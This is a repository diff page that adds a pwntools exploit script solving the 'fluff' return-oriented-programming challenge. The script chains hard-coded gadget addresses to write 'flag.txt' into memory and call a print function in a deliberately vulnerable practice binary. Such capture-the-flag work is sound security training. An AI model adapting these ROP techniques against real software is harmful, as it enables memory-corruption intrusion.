summaryrefslogtreecommitdiff
path: root/x86_64/fluff/exploit.py
diff options
context:
space:
mode:
Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-xx86_64/fluff/exploit.py49
1 files changed, 49 insertions, 0 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
generated by cgit v1.2.3 (git 2.39.1) at 2024-09-21 07:40:34 +0000